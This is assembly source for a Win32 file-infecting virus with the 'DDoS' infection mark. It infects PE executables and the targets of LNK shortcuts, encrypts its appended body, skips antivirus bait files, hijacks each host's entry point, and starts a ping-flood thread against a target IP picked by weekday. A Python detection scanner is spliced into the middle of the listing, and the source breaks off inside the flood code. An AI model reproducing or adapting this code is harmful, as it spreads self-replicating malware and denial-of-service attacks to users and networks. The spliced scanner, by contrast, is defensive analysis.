                                    ; with some luck, we infect 100 files each run
                                    ; all over the HD *g*
                                    ; I think this can be called successful spreading *g*

    lea edi, [ebp+windir]
    call dword ptr [ebp+XSetCurrentDirectoryA]

InfectWinDirAgain:
    mov [ebp+InfCounter], 20d
    call ParseFolder                ; let's parse the start menu and follow all
                                    ; LNK-Files inside ;)

    jmp PayLoad                     ; start the evil part of this thingie ..

ParseFolder:
    call InfectCurDir               ; infect the current directory
    cmp [ebp+InfCounter], 0
    jbe EndParsing                  ; we infected enough ? ok, leave !

    lea esi, [ebp+Folders]
    call FindFirstFileProc
    inc eax
    jz EndParsing                   ; If there are no directories we return
    dec eax                         ; otherwise we save the handle

GetOtherDir:
; first of all we check if this
; is a valid directory

    mov eax, dword ptr [ebp+WFD_dwFileAttributes]
    and eax, 10h                    ; if not we get the next
    jz NoThisOne                    ; one

    lea esi, [ebp+WFD_szFileName]
    cmp byte ptr [esi], '.'         ; we will not parse into . or ..
    je NoThisOne                    ; directories

    push 03h
    pop ecx
    call GetRand

    dec edx                         ; if division-rest (edx) = 1
    jz ParseNewDir                  ; we get this directory

NoThisOne:

    call FindNextFileProc

    test eax, eax
    jnz GetOtherDir

EndParseDir2:                       ; we close the search - Handle

    mov eax, dword ptr [ebp+FindHandle]
    push eax
    call dword ptr [ebp+XFindClose]

EndParsing:                         ; we just return
    ret

ParseNewDir:                        ; we got a directory, let's change to it
                                    ; and infect it.. *eg*

    mov eax, dword ptr [ebp+FindHandle]
    push eax
    call dword ptr [ebp+XFindClose]

    lea esi, [ebp+WFD_szFileName]
    push esi
    call dword ptr [ebp+XSetCurrentDirectoryA]

    jmp ParseFolder

; ***************************************************************************
; -----------------[ Let's get the Startmenue folder ]-----------------------
; ***************************************************************************

GetStartMenue:                      ; Let's try to open HKEY_USERS registry Key

    lea esi, [ebp+RegHandle]
    push esi
    push 001F0000h                  ; complete access
    push 0h                         ; reserved
    lea esi, [ebp+SubKey]
    push esi
    push 80000003h                  ; HKEY_USERS
    call dword ptr [ebp+XRegOpenKeyExA]

    test eax, eax                   ; if we failed opening the key, we return
    jnz NoStartMenue

; let's get the value
    lea esi, [ebp+BufferSize]
    push esi
    lea esi, [ebp+windir]
    push esi
    lea esi, [ebp+ValueType]
    push esi                        ; Type of Value
    push 0                          ; reserved
    lea esi, [ebp+Value]
    push esi                        ; ValueName
    mov eax, [ebp+RegHandle]
    push eax                        ; Reg-Key Handle
    call dword ptr [ebp+XRegQueryValueExA]

    mov eax, dword ptr [ebp+RegHandle]
    push eax
    call dword ptr [ebp+XRegCloseKey]

NoStartMenue:

    ret

SubKey      db '.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 0
Value       db 'Start Menu', 0
ValueType   dd 0h                   ; Type of registry Value
BufferSize  dd 7Fh                  ; size of buffer

; ***************************************************************************
; ----------------[ API - Tables and some other data ]-----------------------
; ***************************************************************************

; Misc Data .. ;)
Folders     db '*.', 0              ; search for directories
RootDir     db 'C:\', 0             ; we want to start parsing at root of Drive C:

; Here follow the tables of the api's we use
; for our virus, if you want to know what they
; do exactly simply check the Win32
; Programmer's Reference
; I won't explain them ( I think the names of them
; makes it clear enough *g* )

Kernel32Names:                      ; 17d API's we want from Kernel32.dll

NumberOfKernel32APIS equ 17d

    db 'FindFirstFileA', 0
    db 'FindNextFileA', 0
    db 'FindClose', 0
    db 'CreateFileA', 0
    db 'SetFileAttributesA', 0
    db 'CloseHandle', 0
    db 'CreateFileMappingA', 0
    db 'MapViewOfFile', 0
    db 'UnmapViewOfFile', 0
    db 'GetWindowsDirectoryA', 0
    db 'GetSystemDirectoryA', 0
    db 'GetCurrentDirectoryA', 0
    db 'SetCurrentDirectoryA', 0
    db 'GetFileAttributesA', 0
    db 'GetTickCount', 0
    db 'CreateThread', 0
    db 'GetSystemTime', 0

ImageHLPNames:
    db 'CheckSumMappedFile', 0h

ADVAPI32Names:
    db 'RegOpenKeyExA', 0
    db 'RegQueryValueExA', 0
    db 'RegCloseKey', 0

WSOCK32Names:
    db 'socket', 0
    db 'WSACleanup', 0
    db 'WSAStartup', 0
    db 'closesocket', 0
    db 'sendto', 0
    db 'setsockopt', 0

; ***************************************************************************
; --------------[ Retrieve API's with GetProcAddress ]-----------------------
; ***************************************************************************

; esi points to the Table of Names
; edi to the offsets
; ebx contains the module-handle
; ecx the number of API's

GetAPI3:
    push ecx                        ; save ecx

    push esi                        ; push api-name
    push ebx                        ; Push Module-Handle

; call GetProcAddress

    call dword ptr [ebp+XGetProcAddress]
    stosd                           ; store api-offset

    pop ecx                         ; did we get them all ?
    dec ecx
    jz EndApi3                      ; if yes then return

    push ecx                        ; otherwise move esi to next API-Name

SearchZero:                         ; we search for the end of the current
    cmp byte ptr [esi], 0h          ; api name ( always 0h ) and increase
    je GotZero
    inc esi
    jmp SearchZero

GotZero:
    inc esi
    pop ecx                         ; get ecx ( counter )

    jmp GetAPI3                     ; retrieve Next API

EndApi3:
    ret

; ***************************************************************************
; --------------[ Search Kernel Export Table for API's ]---------------------
; ***************************************************************************

SearchAPI1:                         ; In this procedure we search for the first 2 API's
; clear the counter

    and word ptr [ebp+counter], 0h

    mov eax, [ebp+KernelAddy]       ; Load the PE-Header Offset

    mov esi, [eax+78h]              ; Get Export Table Address
    add esi, [ebp+MZAddy]           ; normalize RVA
    add esi, 1Ch                    ; skip not needed data

; now we have the Address Table RVA-Offset in esi

    lodsd                           ; Get Address Table RVA
    add eax, [ebp+MZAddy]           ; convert to VA and save it
    mov dword ptr [ebp+ATableVA], eax

    lodsd                           ; Get Name Pointer Table RVA
    add eax, [ebp+MZAddy]           ; make it VA and save it
    mov dword ptr [ebp+NTableVA], eax

    lodsd                           ; Get Ordinal Table RVA
    add eax, [ebp+MZAddy]           ; guess what ? *g*
    mov dword ptr [ebp+OTableVA], eax

    mov esi, [ebp+NTableVA]         ; Get the Name Pointer Table Addy in esi

SearchNextApi1:
    push esi                        ; Save Pointer Table

    lodsd
    add eax, [ebp+MZAddy]           ; make it VA

    mov esi, eax                    ; API Name in the Kernel Export API
    mov edi, edx                    ; API we are looking for
    push ecx                        ; save the size

    cld                             ; Clear direction Flag
    rep cmpsb                       ; Compare it
    pop ecx
    jz FoundApi1                    ; Are they equal ?

    pop esi                         ; Get the Pointer Table
    add esi, 4h                     ; Set Pointer to the next api
    inc word ptr [ebp+counter]
    cmp word ptr [ebp+counter], 2000h
    je NotFoundApi1
    jmp SearchNextApi1              ; test next API

FoundApi1:
    pop esi                         ; clear stack ( we don't want buffer overflows
                                    ; ok, we want them, but not here *bg* )

    movzx eax, word ptr [ebp+counter]
    shl eax, 1h                     ; multiply eax with 2

; Make eax Point to the right entry inside the
; Ordinal Table

    add eax, dword ptr [ebp+OTableVA]
    xor esi, esi                    ; clear esi
    xchg eax, esi                   ; make esi point to the entry
    lodsw                           ; get Ordinal in AX
    shl eax, 2h                     ; eax * 4
    add eax, dword ptr [ebp+ATableVA]
    mov esi, eax                    ; esi points to the address RVA
    lodsd                           ; eax = address RVA
    add eax, [ebp+MZAddy]           ; Make it VA

    ret                             ; Return with API-Addy in eax

NotFoundApi1:
    xor eax, eax                    ; We didn't find the API we need :(
    ret                             ; We set EAX to 0 to show we have to
                                    ; return to the host..

; ***************************************************************************
; -------------------[ Execute the original Program ]------------------------
; ***************************************************************************

ExecuteHost:                        ; Here we execute the original program

    lea edi, [ebp+curdir]           ; we return to the original directory..
    push edi
    call dword ptr [ebp+XSetCurrentDirectoryA]

    or ebp, ebp                     ; if this is a virus of the first generation
    jz FirstGenHost                 ; we can't return to a host, so we
                                    ; stop this with ExitProcess..
Error_ExecuteHost:

    mov eax, dword ptr [ebp+SEH_Save]
    push eax
    mov fs:[0], esp

    mov eax, 12345678h              ; here we return to
    org $-4                         ; the old entry point
retEIP      dd 0h                   ; of the infected file

    add eax, 12345678h
    org $-4
retBas      dd 0h

    jmp eax

FirstGenHost:
    push 0h                         ; Stop executing this stuff ( first Generation
    call ExitProcess                ; only )

OldEIP      dd 0h                   ; Old Entry Point
OldBase     dd 0h                   ; Old Imagebase

NewEIP      dd 0h                   ; New Entry Point ( points to our virus.. )

; ***************************************************************************
; ----------------[ We try to find the Kernel Address ]----------------------
; ***************************************************************************

GetKernel:                          ; Here we try to retrieve the Kernel
; set search range

    mov byte ptr [ebp+K32Trys], 5h

GK1:
    cmp byte ptr [ebp+K32Trys], 00h
    jz NoKernel                     ; Did we pass our limit of 50 pages ?

    call CheckMZSign                ; Has this Page a DOS EXE-Header ?
    jnc CheckPE

GK2:
    sub esi, 10000h                 ; Get the next page
    dec byte ptr [ebp+K32Trys]
    jmp GK1                         ; Check it

CheckPE:                            ; Let's check if we really found
    mov edi, [esi+3Ch]              ; the Kernel32.dll PE-Header
    add edi, esi
    call CheckPESign                ; check for PE-Sign

    jnc CheckDLL                    ; check for the DLL-Flag
    jmp GK2

CheckDLL:
    add edi, 16h                    ; check for the Dll-Flag
    mov bx, word ptr [edi]          ; get characteristics
    and bx, 0F000h                  ; we need just the Dll-Flag
    cmp bx, 02000h
    jne GK2                         ; if it is no dll go on searching

KernelFound:                        ; we found the Kernel32.dll
    sub edi, 16h                    ; set edi to the PE - Header
    xchg eax, edi                   ; save PE address in eax
    xchg ebx, esi                   ; save MZ address in ebx
    cld

    ret

NoKernel:                           ; if not found we set the carry flag
    stc
    ret                             ; return if not found

K32Trys     db 5h                   ; Search-Range

; ***************************************************************************
; -----------------[ Infection of the current directory ]--------------------
; ***************************************************************************

InfectCurDir:                       ; Here we infect the files in the current directory
                                    ; we use the FindFirstFile - FindNextFile API's
                                    ; to scan all files for PE-Executables and
                                    ; LNK-Files.

    lea esi, [ebp+filemask]
    call FindFirstFileProc

    inc eax
    jz EndInfectCurDir1             ; If there are no files, we return
    dec eax

InfectCurDirFile:
; filename in esi

    lea esi, [ebp+WFD_szFileName]
    call InfectFile                 ; Try to infect it !

    cmp [ebp+InfCounter], 0h        ; if we infected enough files
    jna EndInfectCurDir2            ; we return

    call FindNextFileProc

    test eax, eax
    jnz InfectCurDirFile

EndInfectCurDir2:                   ; we close the search - Handle

    push dword ptr [ebp+FindHandle]
    call dword ptr [ebp+XFindClose]

EndInfectCurDir1:                   ; we just return
    ret

InfCounter  db 0h                   ; Counter for the number of files we infect
                                    ; at max in the current directory
                                    ; ( could take too long if we want to infect them
                                    ; all )

FindHandle  dd 0h                   ; The handle for the FindFirstFile API

filemask    db '*.*', 0             ; we search for all files, not just exe files

; these structures are necessary
; for the FindFileFirst - FindFileNext API's

; ***************************************************************************
; ---------------------[ Prepare infection of file ]-------------------------
; ***************************************************************************

InfectFile:                         ; Here we prepare to infect the file
                                    ; the filename is in [ebp+WFD_szFileName]
                                    ; we open it and check if it is something
                                    ; we are able to infect...
                                    ; esi points to the filename..

    cmp byte ptr [esi], '.'         ; check if we got .. or .
    je NoInfection

; if the file is smaller than
; 200 Bytes it will not get checked or
; infected !

    cmp dword ptr [ebp+WFD_nFileSizeLow], 200d
    jbe NoInfection

; we also don't infect it if it is too big
    cmp dword ptr [ebp+WFD_nFileSizeHigh], 0
    jne NoInfection

    call CheckFileName              ; check for AV-Files
    jc NoInfection

; Get File-Attributes
    lea eax, [ebp+WFD_szFileName]
    push eax
    call dword ptr [ebp+XGetFileAttributesA]

; save them
    mov dword ptr [ebp+Attributes], eax

    inc eax
    jz NoInfection                  ; if we failed we don't infect
    dec eax

    push 80h                        ; clean attributes
    lea eax, [ebp+WFD_szFileName]
    push eax
    call dword ptr [ebp+XSetFileAttributesA]
    or eax, eax                     ; if we fail, we don't open the file
    jz NoInfection                  ; if we have no access to set the attributes,
                                    ; we will surely not be allowed to change the file itself

    call OpenFile                   ; open the file
    jc NoInfection                  ; if we failed we don't infect..

    mov esi, eax
    call CheckMZSign                ; if it is an EXE file, we go on
    jc CheckLNK                     ; otherwise we test if it is a LNK

    cmp word ptr [eax+3Ch], 0h
    je CheckLNK

    xor esi, esi                    ; get the start of the PE-Header
    mov esi, [eax+3Ch]

; if it lies outside the file we skip it
    cmp dword ptr [ebp+WFD_nFileSizeLow], esi
    jb Notagoodfile

    add esi, eax

    mov edi, esi
    call CheckPESign                ; check if it is a PE-Executable
    jc Notagoodfile

; check infection mark --> DDoS

; if it is there the file is already infected..

    cmp dword ptr [esi+4Ch], 'SoDD'
    jz Notagoodfile

    mov bx, word ptr [esi+16h]      ; get characteristics
    and bx, 0F000h                  ; we need just the Dll-Flag
    cmp bx, 02000h
    je Notagoodfile                 ; we will not infect dll-files

    mov bx, word ptr [esi+16h]      ; get characteristics again
    and bx, 00002h                  ; we check if it is no OBJ or something else..
    cmp bx, 00002h
    jne Notagoodfile

    call InfectEXE                  ; ok, infect it !
                                    ; if there occurred an error
                                    ; while mapping the file again,
                                    ; we don't need to unmap & close it

    jc NoInfection
    jmp Notagoodfile

CheckLNK:                           ; check if we got an LNK-File
    mov esi, dword ptr [ebp+MapAddress]
    cmp word ptr [esi], 'L'         ; check for sign
    jne UnMapFile                   ; if it is no LNK File we close it

    call InfectLNK

Notagoodfile:
    call UnMapFile                  ; we store the file..

; we restore the file-attributes

    push dword ptr [ebp+Attributes]
    lea eax, [ebp+WFD_szFileName]
    push eax
    call dword ptr [ebp+XSetFileAttributesA]

NoInfection:
    ret

; ***************************************************************************
; ------------------------[ Open and close Files ]---------------------------
; ***************************************************************************

OpenFile:

    xor eax, eax                    ; let's open the file
    push eax
    push eax
    push 3h
    push eax
    inc eax
    push eax
    push 80000000h or 40000000h
    push esi                        ; name of file
    call dword ptr [ebp+XCreateFileA]

    inc eax
    jz Closed                       ; if there is an error we don't infect the file
    dec eax                         ; now the handle is in eax

; we save it

    mov dword ptr [ebp+FileHandle], eax

; if we map a file normally, we map it with the size
; in the Find32-Data; otherwise it is in ecx

    mov ecx, dword ptr [ebp+WFD_nFileSizeLow]

CreateMap:
    push ecx                        ; save the size

    xor eax, eax                    ; we create a map of the file to
    push eax                        ; be able to edit it
    push ecx
    push eax
    push 00000004h
    push eax
    push dword ptr [ebp+FileHandle]
    call dword ptr [ebp+XCreateFileMappingA]

    mov dword ptr [ebp+MapHandle], eax

    pop ecx                         ; get the size again..
    test eax, eax                   ; if there is an error we close the file
    jz CloseFile                    ; no infection today :(

    xor eax, eax                    ; we map the file.. *bla*
    push ecx
    push eax
    push eax
    push 2h
    push dword ptr [ebp+MapHandle]
    call dword ptr [ebp+XMapViewOfFile]

    or eax, eax                     ; if there is an error, we unmap it
    jz UnMapFile

; eax contains the offset where
; our file is mapped.. *g*

    mov dword ptr [ebp+MapAddress], eax
; Clear c-flag for successful opening

    clc

    ret                             ; we successfully opened it !

UnMapFile:                          ; ok, unmap it

    call UnMapFile2

CloseFile:                          ; let's close it

    push dword ptr [ebp+FileHandle]
    call [ebp+XCloseHandle]

Closed:
    stc                             ; set carry flag

    ret

UnMapFile2:                         ; we need to unmap it sometimes, to
                                    ; map it again with more space..

    push dword ptr [ebp+MapAddress]

    call dword ptr [ebp+XUnmapViewOfFile]

    push dword ptr [ebp+MapHandle]
    call dword ptr [ebp+XCloseHandle]

    ret

; ***************************************************************************
; -------------------------[ Infect an EXE-FILE ]----------------------------
; ***************************************************************************

InfectEXE:                          ; MapAddress contains the starting offset of the file

; we will not infect exe files, which are smaller than
; 40 Kb, this is for avoiding goat files.
; AV's use them to study viruses !

    cmp dword ptr [ebp+WFD_nFileSizeLow], 0A000h
    jb NoEXE

    mov ecx, [esi+3Ch]              ; esi points to the PE-Header
                                    ; ecx contains file-alignment
                                    ; put size in eax

    mov eax, dword ptr [ebp+WFD_nFileSizeLow]
    add eax, dword ptr [ebp+VirLen]

    call Align                      ; align it and save the new size
    mov dword ptr [ebp+NewSize], eax
    xchg ecx, eax

    pushad                          ; save registers
                                    ; we close the file and map it again,
                                    ; but this time we will load it
                                    ; with some more space, so we can add
                                    ; our code *eg*

    call UnMapFile2
    popad

    call CreateMap                  ; we map it again with a bigger size
                                    ; if we got an error we return

    jc NoEXE
; make esi point to the PE-Header again
; get offset

    mov esi, dword ptr [eax+3Ch]
; make it VA

    add esi, eax
    mov edi, esi                    ; edi = esi

; eax = number of sections
    movzx eax, word ptr [edi+06h]
    dec eax
    imul eax, eax, 28h              ; multiply with size of section header
    add esi, eax                    ; make it VA
    add esi, 78h                    ; make it point to dir table

; esi points now to the dir-table

    mov edx, [edi+74h]              ; get number of dir - entries
    shl edx, 3h                     ; multiply with 8
    add esi, edx                    ; make point to the last section

; get the Entry Point and save it
; we need it to be able to return

; to the original file

    mov eax, [edi+28h]
    mov dword ptr [ebp+OldEIP], eax

; get the imagebase, also needed to
; execute original file

    mov eax, [edi+34h]
    mov dword ptr [ebp+OldBase], eax

    mov edx, [esi+10h]              ; size of raw data
                                    ; we will increase it later

    mov ebx, edx
    add edx, [esi+14h]              ; edx = Pointer to raw-data

    push edx                        ; save it in stack

    mov eax, ebx
    add eax, [esi+0Ch]              ; make it VA

; this is our new EIP

    mov [edi+28h], eax
    mov dword ptr [ebp+NewEIP], eax

    mov eax, [esi+10h]              ; get size of Raw-data
    push eax
    add eax, dword ptr [ebp+VirLen]

; increase it
    mov ecx, [edi+3Ch]              ; Align it

    call Align

; save it in the file as
; new size of rawdata and

    mov [esi+10h], eax

    pop eax                         ; new Virtual size
    add eax, dword ptr [ebp+VirLen]
    add eax, Buffersize
    mov [esi+08h], eax

    pop edx

    mov eax, [esi+10h]
    add eax, [esi+0Ch]              ; New Size of Image

; save it in the file
    mov [edi+50h], eax

; change section flags to make
; us have write & read access to it
; when the infected file is run
; we also set the code flag.. ;)

    or dword ptr [esi+24h], 0A0000020h
; we write our infection mark to the program,
; so we will not infect it twice
; --> DDoS

    mov dword ptr [edi+4Ch], 'SoDD'
    push edi                        ; save them
    push edx

    push 10d
    pop ecx
    call GetRand                    ; get random number ( we'll use the EAX value )

    pop edi                         ; restore and xchange
    pop edx

    mov word ptr [ebp+Key], ax
    push eax                        ; save it 2 times

    lea esi, [ebp+Virus]            ; point to start of virus
    add edi, dword ptr [ebp+MapAddress]
    push edi                        ; save edi

    mov ecx, dword ptr [ebp+VirLen]
; get size of virus in ecx

    rep movsb                       ; append virus !

    pop esi                         ; decrypt the virus
    mov edi, esi
    add esi, NoCrypt
    mov ecx, (CryptSize / 2)

    pop edx                         ; get key from stack
    push edi                        ; save start
    mov edi, esi

EnCryptLoop:                        ; decrypt with second layer
    lodsw
    not ax
    inc dx
    xchg dl, dh
    xor ax, dx
    xchg al, ah
    stosw
    loop EnCryptLoop

    pop esi                         ; let's start decrypting with the second layer
    add esi, 05h                    ; skip the call
    mov ecx, FirstLSize             ; mov size to ecx
    mov edi, esi
    mov edx, dword ptr [ebp+CryptType]
    xor eax, eax

XorEncrypt:                         ; we use a simple xor
    dec edx
    jnz NegEncrypt
    mov dl, byte ptr [ebp+PolyKey]

@Xor:
    lodsb

    xor al, dl
    stosb
    loop @Xor
    jmp EndPolyCrypto

NegEncrypt:
    dec edx
    jnz NotEncrypt

@Neg:
    lodsb

    neg al
    stosb
    loop @Neg
    jmp End2LCrypto

NotEncrypt:                         ; not byte ptr [esi]
    dec edx
    jnz IncEncrypt

@Not:
    lodsb

    not al
    stosb
    loop @Not
    jmp End2LCrypto

IncEncrypt:                         ; inc byte ptr [esi]
    dec edx
    jnz DecEncrypt

@Inc:
    lodsb

    dec al
    stosb
    loop @Inc
    jmp End2LCrypto

DecEncrypt:                         ; dec byte ptr [esi]
    lodsb

    inc al
    stosb
    loop DecEncrypt

End2LCrypto:

    dec byte ptr [ebp+InfCounter]

; if we successfully received the dll and the
; function, we create a checksum for the
; file ( needed for dll's and WinNT )

    cmp [ebp+XCheckSumMappedFile], 0h
    je NoCRC

    lea esi, [ebp+CheckSum]
    push esi
    lea esi, [ebp+HeaderSum]
    push esi
    push dword ptr [ebp+NewSize]
    push dword ptr [ebp+MapAddress]
    call dword ptr [ebp+XCheckSumMappedFile]

    test eax, eax                   ; if this failed we don't save
    jz NoCRC                        ; the crc

    mov eax, dword ptr [ebp+MapAddress]
; eax points to the dos-stub

    mov esi, [eax+3Ch]              ; esi points to PE-Header
    add esi, eax                    ; save CRC in header

    mov eax, dword ptr [ebp+CheckSum]
    mov [esi+58h], eax

NoCRC:
    ret

NoEXE:                              ; let's return and close the infected file
                                    ; this will also write it to disk !

    stc
    ret
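The header edits InfectEXE makes above leave a fixed set of traces in a host: the 'DDoS' mark at PE+4Ch, an entry point moved into the enlarged last section, the 0A0000020h flag combination on that section, and a checksum re-stamped through CheckSumMappedFile. The following Python scanner checks a file for exactly those traces; it is an added example written for this page, not code from the listing or from its author, and the two-section PE image it builds is constructed purely for the demonstration (the virus length, section sizes and addresses in it are assumptions).

```python
"""Static triage for the Win32.DDoS infection traces left by InfectEXE.

Added example, not part of the original listing. scan() reports the 'DDoS'
mark in the reserved Win32VersionValue field (PE header + 4Ch), an entry
point inside the last section, the 0A0000020h section flags and a stored
checksum that no longer matches the file. build_sample() is a constructed
PE32 image used only to exercise the checks offline.
"""
import struct

RWX_CODE = 0xA0000020          # IMAGE_SCN_CNT_CODE | MEM_READ | MEM_WRITE, as or'ed in by the virus


def pe_offset(data: bytes) -> int:
    """Offset of the 'PE\\0\\0' signature; same MZ/e_lfanew walk as the virus, with bounds checks."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if pe + 0x78 > len(data) or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE header")
    return pe


def pe_checksum(data: bytes) -> int:
    """PE checksum as CheckSumMappedFile computes it: dword sum with carry folding, plus file length."""
    pe = pe_offset(data)                         # assumes e_lfanew is dword aligned (PE spec requirement)
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == pe + 0x58:                     # the CheckSum field itself is excluded from the sum
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def scan(data: bytes) -> list:
    """Return a list of findings; an empty list means none of the DDoS traces is present."""
    pe = pe_offset(data)
    nsect = struct.unpack_from("<H", data, pe + 0x06)[0]
    opt_size = struct.unpack_from("<H", data, pe + 0x14)[0]
    entry = struct.unpack_from("<I", data, pe + 0x28)[0]
    stored = struct.unpack_from("<I", data, pe + 0x58)[0]
    findings = []
    if data[pe + 0x4C:pe + 0x50] == b"DDoS":     # the 'SoDD' dword literal lands in memory as "DDoS"
        findings.append("infection mark 'DDoS' in Win32VersionValue (PE+4Ch)")
    if nsect:
        last = pe + 0x18 + opt_size + (nsect - 1) * 0x28   # header of the section the virus extends
        vsize, va, rawsize = struct.unpack_from("<III", data, last + 8)
        flags = struct.unpack_from("<I", data, last + 0x24)[0]
        if va <= entry < va + max(vsize, rawsize):
            findings.append("entry point %#x lies in the last section" % entry)
        if flags & RWX_CODE == RWX_CODE:
            findings.append("last section is code+read+write (0A0000020h)")
    if stored and stored != pe_checksum(data):   # zero means 'no checksum', which is normal for many EXEs
        findings.append("stored checksum %#x does not match the file" % stored)
    return findings


def build_sample(infected: bool) -> bytes:
    """Constructed two-section PE32 image; infected=True applies the header edits InfectEXE makes."""
    vir_len = 0x200                              # assumed (already aligned) length of the appended body
    mz = bytearray(0x40)
    mz[:2] = b"MZ"
    struct.pack_into("<I", mz, 0x3C, 0x40)       # e_lfanew
    file_hdr = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)     # PE32 magic
    struct.pack_into("<I", opt, 0x1C, 0x400000)  # ImageBase
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)   # section / file alignment
    struct.pack_into("<I", opt, 0x5C, 16)        # NumberOfRvaAndSizes
    text = b".text".ljust(8, b"\0") + struct.pack("<IIIIIIHHI", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    vsize, rawsize, flags, entry = 0x100, 0x200, 0xC0000040, 0x1000
    if infected:
        entry = 0x2000 + rawsize                 # NewEIP = VirtualAddress + old SizeOfRawData
        vsize, rawsize = rawsize + vir_len, rawsize + vir_len
        flags |= RWX_CODE
        opt[0x34:0x38] = b"DDoS"                 # Win32VersionValue, i.e. PE+4Ch
    struct.pack_into("<I", opt, 0x10, entry)
    struct.pack_into("<I", opt, 0x38, (0x2000 + vsize + 0xFFF) & ~0xFFF)   # SizeOfImage
    last = b".data".ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, 0x2000, rawsize, 0x400, 0, 0, 0, 0, flags)
    image = bytearray((bytes(mz) + file_hdr + bytes(opt) + text + last).ljust(0x200, b"\0"))
    image += bytes(0x200) + bytes(rawsize)       # .text raw data, then .data (+ appended body)
    struct.pack_into("<I", image, 0x40 + 0x58, pe_checksum(image))   # stamp a valid checksum like the virus
    return bytes(image)


if __name__ == "__main__":
    for label in ("clean", "infected"):
        print(label, scan(build_sample(label == "infected")) or ["no DDoS traces"])
```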

; ***************************************************************************
; ------------------------[ Infect an LNK-FILE ]-----------------------------
; ***************************************************************************

InfectLNK:                          ; if we find a link file, we try to find the
                                    ; file it points to. If it is an EXE File we are able
                                    ; to infect, we do so
                                    ; this will not work with NT-LNK-Files, there we will
                                    ; receive only the Drive, where the file is located

; ok, if a LNK is bigger than 1 Meg, it is none
; we check .. ;)

    cmp dword ptr [ebp+WFD_nFileSizeLow], 0400h
    ja NoLNK

; get the start addy in esi, and the size
    mov esi, dword ptr [ebp+MapAddress]
    mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
    xor edx, edx
    add esi, ecx                    ; we start checking at the end of the file
                                    ; for a valid filename in it
CheckLoop:

    cmp byte ptr [esi], 3ah         ; we detect a filename by the 2 dots ( 3ah = : )
    jne LNKSearch                   ; in the Drive

    inc edx                         ; there are 2 times 2 dots, when checking from
    cmp edx, 2d                     ; the end of the LNK, we need the 2.nd
    je PointsDetected

LNKSearch:                          ; go on searching
    dec esi
    loop CheckLoop

; if we end here, we did not find the two dots.. :(
NoLNK:

    ret

PointsDetected:                     ; we found the drive ( two dots ... *g* )
                                    ; esi points to them, now we need to check
                                    ; for the start of the name..

    cmp byte ptr [esi+1], 0h        ; check if we got an entire path or just a
    je NoLNK                        ; single drive ( may happen in NT / 2k )

PointsDetected2:
    dec esi
    cmp byte ptr [esi], 0h
    je NameDetected

    loop PointsDetected2            ; ecx still takes care, that we don't
                                    ; search too far..

    jmp NoLNK                       ; nothing found ? return..

NameDetected:                       ; ok, esi points now to the name of the file
                                    ; so we try a FindFileFirst to get the information
                                    ; first, we save the information in the WIN32_FIND_DATA
                                    ; then we try to find the file.

    inc esi
    push esi                        ; save it

    lea esi, [ebp+WIN32_FIND_DATA]

    lea edi, [ebp+Buffer]           ; save the old WIN32_FIND_DATA
    mov ecx, 337d                   ; and some more data
    rep movsb

    lea edi, [ebp+WIN32_FIND_DATA]
    xor eax, eax                    ; clean this field
    mov ecx, 337d
    rep stosb

    pop esi

    call FindFirstFileProc

    inc eax
    jz RestoreLNK                   ; If there are no files, we return
    dec eax

; otherwise we save the handle

; if we went here, we know the file exists
; esi still points to the filename including the
; directory, we save this in the win32_Find_DATA
; field, because the name there contains no path

    lea edi, [ebp+WFD_szFileName]
    mov ecx, 259d                   ; we just move 259 Bytes, so there is still an ending
                                    ; Zero if the name is longer and we just get a simple error
                                    ; and not an SEH or some other shit

    rep movsb
    lea esi, [ebp+WFD_szFileName]
    call InfectFile                 ; esi points to the filename again, so we infect it ;)

    push dword ptr [ebp+LNKFindHandle]
    call dword ptr [ebp+XFindClose]

RestoreLNK:
    lea edi, [ebp+WIN32_FIND_DATA]
    lea esi, [ebp+Buffer]           ; restore the old WIN32_FIND_DATA
    mov ecx, 337d                   ; and some other data
    rep movsb

    ret                             ; return to find more files

LNKFindHandle dd 0h                 ; here we save the search-handle

; ***************************************************************************
; ---------------------[ The evil Part: the Payload ]------------------------
; ***************************************************************************

PayLoad:                            ; here we handle the payload of the virus *eg*

    cmp dword ptr [ebp+W32Handle], 0
    jne ExecuteHost

    cmp dword ptr [ebp+XCreateThread], 0
    je ExecuteHost                  ; we better check this, cause this api does not exist in 2k

    lea eax, [ebp+SystemTime]       ; retrieve current date, time,.. whatever
    push eax
    call dword ptr [ebp+XGetSystemTime]

    lea esi, [ebp+wDayOfWeek]       ; get the day
    xor eax, eax
    lodsw

    shl eax, 2h                     ; multiply with 4
; get Target

    lea esi, [ebp+TargetTable]
    add esi, eax
    lea edi, [ebp+Target_IP]        ; write IP to Destination Address Field
    movsd

; we get a nice target for the payload
; and create a new thread to fulfill it ;)

    push offset threadID            ; here we save the thread ID
    push 0h
    push 0h
    push offset PingFlood           ; here starts the code of the new thread
    push 0h
    push 0h
    call dword ptr [ebp+XCreateThread]

    jmp ExecuteHost                 ; we're finished, so we execute the host-file

PingFlood:                          ; this is the thread of the payload !
                                    ; here are we doing the really evil thingies ;)
                                    ; we will start pinging a server ;P

    lea eax, [ebp+offset WSA_DATA]
    push eax                        ; where is it..
    push 0101h                      ; required version
    call dword ptr [ebp+XWSAStartup]

    push 1                          ; We want to use the icmp protocol
    push 3                          ; SOCK_STREAM
    push 2                          ; Address Format
    call dword ptr [ebp+Xsocket]

    mov dword ptr [ebp+ICMP_Handle], eax

    push 4                          ; set the options ( timeout, not really
                                    ; necessary in this case *g* )

    lea eax, [ebp+offset Timeout]
    push eax
    push 1006h
    push 0FFFFh
    push eax
    call dword ptr [ebp+Xsetsockopt]

; we need to create a checksum for the packet
    lea esi, [ebp+ICMP_Packet]      ; nothing serious just some additions

